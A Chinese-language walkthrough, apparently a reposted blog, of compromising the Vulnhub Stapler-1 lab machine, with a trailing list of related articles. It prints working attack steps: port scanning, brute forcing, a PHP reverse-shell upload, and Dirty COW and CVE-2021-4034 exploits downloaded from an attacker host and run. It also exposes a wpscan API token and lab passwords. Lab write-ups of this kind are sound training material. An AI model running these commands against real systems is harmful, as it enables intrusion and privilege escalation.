【甄选靶场】Vulnhub百个项目渗透——项目十:stapler-1(文件上传,多方式提权)

article/2025/9/18 23:33:31

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目十:stapler-1(文件上传,多方式提权)

==========================靶场环境=======================


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月6日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

  • Vulnhub百个项目渗透
  • 前言
  • 一、梳理流程
  • 二、使用步骤
    • 1.端口发现
    • 2.web突破
  • 三、提权
    • 1.脏牛提权
    • 2.CVE-2021-4034
    • 3.sudo提权
  • 四、总结
  • 五、rockyou.txt安装


前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


一、梳理流程

  1. 端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
  2. 信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
  3. 二次收集(基于已得到的服务或者主机再次信息收集)
  4. 内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
  5. 毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)

二、使用步骤

1.端口发现

ifconfig                  //用来查看自己的IPnamp 192.168.247.0/24 -sP //用来扫描同网段所有存活主机,注意最后是0
这个IP是你ifconfig出来的IPnmap -p- 192.168.247.134  //扫描开放端口,找服务
(服务越多,我们越应该兴奋,因为服务多代表漏洞越多,越好下手)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

这里看到了smb,类似于win下的445,用以共享文件

在这里插入图片描述

打开了只有两个用户信息,elly和john
继续下一个服务,ssh,利用九头蛇对elly和john爆破,没有爆出来,先搁置
80端口登不上去,也没有做本地host的方式,但可以爆破目录,发现了两个配置文件,但是没有任何信息
53端口暂时无法使用
666端口
只有139一个netbios-ssn开放(这是windows的永恒之蓝漏洞)
3306mysql我们尝试登录一下,看看能否允许登录
12380端口可以正常访问,这也是一个突破口

在这里插入图片描述

这是666端口的文件,nmap扫出来应该是有一个图片文件
使用nc(因为这个不是特殊服务)来连接端口

> nc 192.168.247.139 666 >rong    --直接下载为本地rong文件
> file rong                       --查看文件类型
> unzip rong                      --解压
> cat message2.jpg                --查看文件
> strings message2.jpg            --查看图片16进制信息
> 啥都没有,先过
mysql -uroot -proot 192.168.247.139   --mysql显示密码错误,就说明可以登录

在这里插入图片描述

简单来说netbios是一个类似于tcp/ip的服务,但是安全性较低
所以现在能使用的就只有:

1.12380的web端口
2.139的netbios-ssn端口
3.smb共享

2.web突破

在这里插入图片描述

nikto -h http://192.168.247.139:12380   
---12380端口进行简单扫描,发现了三个目录,这个时候我们可以开AWVS一把梭,也可以用xray跑一跑

在这里插入图片描述

看到这里有SSL,说明是SSL访问,也就是HTTPS,其他的页面会重定向

在这里插入图片描述

看,这两个页面是一样的,所以我们把http改成https

在这里插入图片描述在这里插入图片描述

告诉我们这里有一个xss漏洞

在这里插入图片描述

AWVS扫出来的漏洞

在这里插入图片描述

在WPSCAN官网注册每天可以用75个API

wpscan --url https://10.211.55.37:12380/blogblog/  -e u --api-token kJ4bhZCgveCcoGJPER7AOsHJTeFDf90Wfj9zu0V6asc --disable-tls-checks
-----使用wpscan扫描

在这里插入图片描述

像这些都去访问一下,看看有没有漏洞
结果发现在uploads存在目录遍历的信息泄露问题
同时还发现了advance_video的插件
这个插件存在漏洞
谷歌搜索一下

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

https://stackoverflow.com/questions/27835619/urllib-and-ssl-certificate-verify-failed-error
这个网站讲了如何修改在https情况下的脚本修改

在这里插入图片描述

这个脚本的就是利用了信息泄露

在这里插入图片描述
在这里插入图片描述

或者在phpmyadmin的图形化页面操作

在这里插入图片描述

进去以后进行mysql的信息收集,一般在数据库里都是找库,找表,找字段,去寻找用户民和密码

在这里插入图片描述在这里插入图片描述

这里找到了密码,我们需要把这些密码解密,目前还有ssh和wp的后台没进去,可以做成一个密码本来尝试登录,也可以手工登录,这里我们先用一个小工具处理一下文字,获得纯密码

把那一大块从mysql复制下来到本地

在这里插入图片描述

awk拆分需要的信息参考文献:https://www.runoob.com/linux/linux-comm-awk.html
awk -F'|' '{print $3}' 1122.txt > 2211.txt    --$3就是第三列,这是一个正则匹配的机制

在这里插入图片描述

利用kali自带的rockyou密码本进行爆破

在这里插入图片描述

john --wordlist=/usr/share/wordlists/rockyou.txt 2211.txt如果你没有rockyou.txt,文章最后po出来了使用方法

最终通过拿着密码对应用户登录验证出来用户john的密码是incorrect
登录到后台

在这里插入图片描述

在其中进行信息收集,看看有没有突破口

在这里插入图片描述

存在文件上传

在这里插入图片描述

搜索kali自带的脚本,利用

locate php-reverse-shell.php
用第三个webshell的版本

在这里插入图片描述

在upload目录下发现了刚才上传的脚本,如果上传失败,可以通过上传绕过的方式

在这里插入图片描述

成功拿到shell,转化为稳定shell

python -c 'import pty; pty.spawn("/bin/bash")'

三、提权

在这里插入图片描述uname -a

用这条命令查看linux内核版本,只要没有X86字样就是32位系统,就不能用X86的EXP

在这里插入图片描述

存在linux内核问题

在这里插入图片描述

存在大量用户

在这里插入图片描述

存在一个用户具有sudo权限,可以进行sudo提权

在这里插入图片描述

环境变量可写入

在这里插入图片描述

les.sh脚本扫到可以脏牛提权

1.脏牛提权

https://www.exploit-db.com/exploits/40847 漏洞文章searchsploit 40847
locate linux/local/40847.cpp
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp .
wget http://192.168.75.1:8081/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow
su root
dirtyCowFun
id

2.CVE-2021-4034

proxychains git clone https://github.com/arthepsy/CVE-2021-4034.git ubuntu 16 基本通杀
wget http://192.168.75.1:8081/CVE-2021-4034/cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o exp
chmod +x exp
./exp

3.sudo提权

gerp -rn "ssh"    ---搜索出ssh用户,里面应该会有peter,之前用linpeas扫出来他可以sudo提权信息泄露得到账号密码
JKanode/.bash_history:6:sshpass -p thisimypassword ssh JKanode@localhost
JKanode/.bash_history:8:sshpass -p JZQuyIN5 peter@localhostssh peter@192.168.75.19 -t '/bin/bash'
JZQuyIN5
sudo -l        ----查看他的sudo能做什么
JZQuyIN5        ----再一次输入密码
sudo su           ----直接提权

四、总结

1.文件上传
2多种方式的.提权

五、rockyou.txt安装

终端输入:wordlists
然后直接回车即可

在这里插入图片描述


http://chatgpt.dhexx.cn/article/WasOpanE.shtml

相关文章

vulnhub靶机:Stapler

文章目录 0x000x01 靶机安装0x02 靶机发现0x03 端口探测0x04 信息收集端口21:FTP服务端口22:SSH服务端口80:HTTP服务端口139:SMB服务端口666:未知服务端口3306:MySQL服务端口12380:HTTP服务 0x0…

实战打靶集锦-006-Stapler

**写在前面:**记录博主的一次打靶经历。 目录 1. 主机发现2. 端口发现3. 服务枚举4. 服务探查4.1 FTP探查4.1.1 匿名登录4.1.2 Elly用户4.1.3 John用户4.1.4 EXP搜索 4.2 dnsmasq探查4.2.1 基础信息获取4.2.2 EXP搜索 4.3 WEB应用探查4.3.1 浏览器访问4.3.2 目录扫描…

Stapler: 1

Stapler: 1 项目地址:https://www.vulnhub.com/entry/stapler-1,150/ 文章目录 Stapler: 1一、信息收集:1. 靶机地址获取:2. 收集端口服务信息: 二、信息利用1. 针对12380端口进行web目录枚举:1.1 访问:ph…

No.10-VulnHub-Stapler: 1-Walkthrough渗透学习

** VulnHub-Stapler: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/stapler-1,150/ 靶机难度:中级(CTF) 靶机发布日期:2016年6月8日 靶机描述:Stapler is reported to be one of several v…

Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)

Stapler:1(STAPLER: 1)靶机渗透-Vulnhub 一、IP端口探测二、端口信息收集1.ftp匿名登录2.OpenSSH漏洞查询3.80端口4.666端口5.SMB枚举6.12380端口 二、边界突破1.video插件文件包含2.修改wordpress数据库管理员密码3.上传webshell 三、提权总…

Stapler#攻略

写在前面:前人栽树后人乘凉,谢谢网上各位大佬的解题思路作为参考学习; 一、实验准备 1、实验地址: Stapler: 1 ~ VulnHub 2、下载之后,本地解压,用VMware运行该虚拟机; ​ 3、设置stapler与攻击…

Stapler-1靶场详细教学(7种漏洞利用+5种提权)

目录 前言 简介 信息收集 0x00 主机发现 0x01 端口探测 0x02 信息收集-1 0x03 信息收集-2 0x04 漏洞利用-1 0x05 信息收集-3 0x06 漏洞利用-2 0x07 漏洞利用-3 0x08漏洞利用-4 0x09 漏洞利用-5 0x10 漏洞利用-6 0x11 漏洞利用-7 提权 0x12 提权-1-内核提权 0…

CSDN开通博客

今天想写博客,却发现没有开通博客页面没有发现验证码, 后来点击验证码输入框,验证码才出来。真是失策,我觉得还是在刷新页面的时候就显示验证码就好了。

【JavaScript 逆向】数美滑块逆向分析

声明 本文章中所有内容仅供学习交流,相关链接做了脱敏处理,若有侵权,请联系我立即删除! 案例目标 验证码:aHR0cHM6Ly93d3cuaXNodW1laS5jb20vbmV3L3Byb2R1Y3QvdHcvY29kZQ 以上均做了脱敏处理,Base64 编码及解…

个人总结 - JS逆向解析

目前加密的方式总结有下面几点: 对称加密(加密解密密钥相同):DES、DES3、AES 非对称加密(分公钥私钥):RSA 信息摘要算法/签名算法:MD5、HMAC、SHA 前端实际使用中MD5、AES、RSA&a…

【JavaScript 逆向】抖店滑块逆向分析

声明 本文章中所有内容仅供学习交流,相关链接做了脱敏处理,若有侵权,请联系我立即删除! 案例目标 接口: aHR0cHM6Ly93d3cuZG91eWluLmNvbS9hd2VtZS92MS93ZWIvdXNlci9wcm9maWxlL290aGVyLw 以上均做了脱敏处理&#…

MAC 逆向APK

准备逆向工具 apkTool 、apkTool.jar 、dex2Jar稳定版 (不要下载最新的2.0或者2.1 最新的dex2jar 运行会报错)、JUI 查看代码结构 (1) apkTool 、apkTool.jar:Apktool - How to Install 上面这段话是&#xff1…

java逆向_Java逆向入门(一)

Java是一门"半编译半解释"型语言.通过使用jdk提供的javac编译器可以将Java源码编译为Java虚拟机(Java Virtual Machine, JVM)可读的字节码(bytecode),即*.class文件. 学习字节码可以使你更好的理解Java虚拟机的行为,甚至对学习其它基于Java虚拟机的语言(如:Scala,Clo…

Android逆向基础——APK的格式

Android 安装包常以apk(android Package)、xapk为后缀,本质是一个压缩包,包内存存放运行着应用程序安装必要的所有资源、代码。可直接修改后缀为zip解包。 解包后目录大致如下: assets 资源文件,通过cont…

JS逆向笔记-记录某测试论坛的js逆向练习

这个网站应该是专门练习的,因为有个地方说不太通,在此只能算是练习,记录下,方便以后进行查阅。 首先访问主页: 他会设置一个cookie值,并且会把加密的salt 带出来。还有个叫lt的东西也会用html的形式传出来。…

Matlab逆向归纳法,逆向归纳法

逆向归纳法(backward induction)是求解动态博弈均衡的方法 [编辑] 什么是逆向归纳法 逆向归纳法(backward induction)是求解动态博弈均衡的方法。所谓动态博弈是指博弈参与人的行动存在着先后次序,并且后行动的参与人能够观察到前面的行动。逆向归纳法在逻辑上是严密…

逆向工程

逆向工程 数据库部分逆向工程说明导入文件 reverseProject添加相应jar包修改这个工程三个 .xml 文件都要修改的地方修改generatorConfig.xml文件 工程终点-运行GeneratorSqlMap.java文件 在使用mybatis时需要根据数据表创建实体类,pojo类的映射文件以及sql语句和Dao…

逆向 实战

逆向实操 汇编 《汇编语言》,王爽 《天书夜读》邵坚磊等 《Intel汇编指令集手册》 基础 学习汇编的原则 不推荐写纯汇编程序,一般都是通过_asm{}方式嵌入部分汇编代码学习汇编的目的是:解底层,调试,逆向分.c-编译->.s-汇编→.o(linux平台)/.obj(wi…

微信逆向分析(一)——逆向分析的原理

逆向的简单理解 正向开发,是先写代码,再编译成软件。而逆向分析,到手的只有软件。从软件入手,推测对应的代码,需要了解一下编译之后的软件是怎么跑起来的。 软件运行过程 1、软件加载到内存。 2、CPU读取内存的指令…

【JavaScript 逆向】网易易盾滑块逆向分析

声明 本文章中所有内容仅供学习交流,相关链接做了脱敏处理,若有侵权,请联系我立即删除! 案例目标 验证码:aHR0cHM6Ly9kdW4uMTYzLmNvbS90cmlhbC9qaWdzYXc 以上均做了脱敏处理,Base64 编码及解码方式&#xf…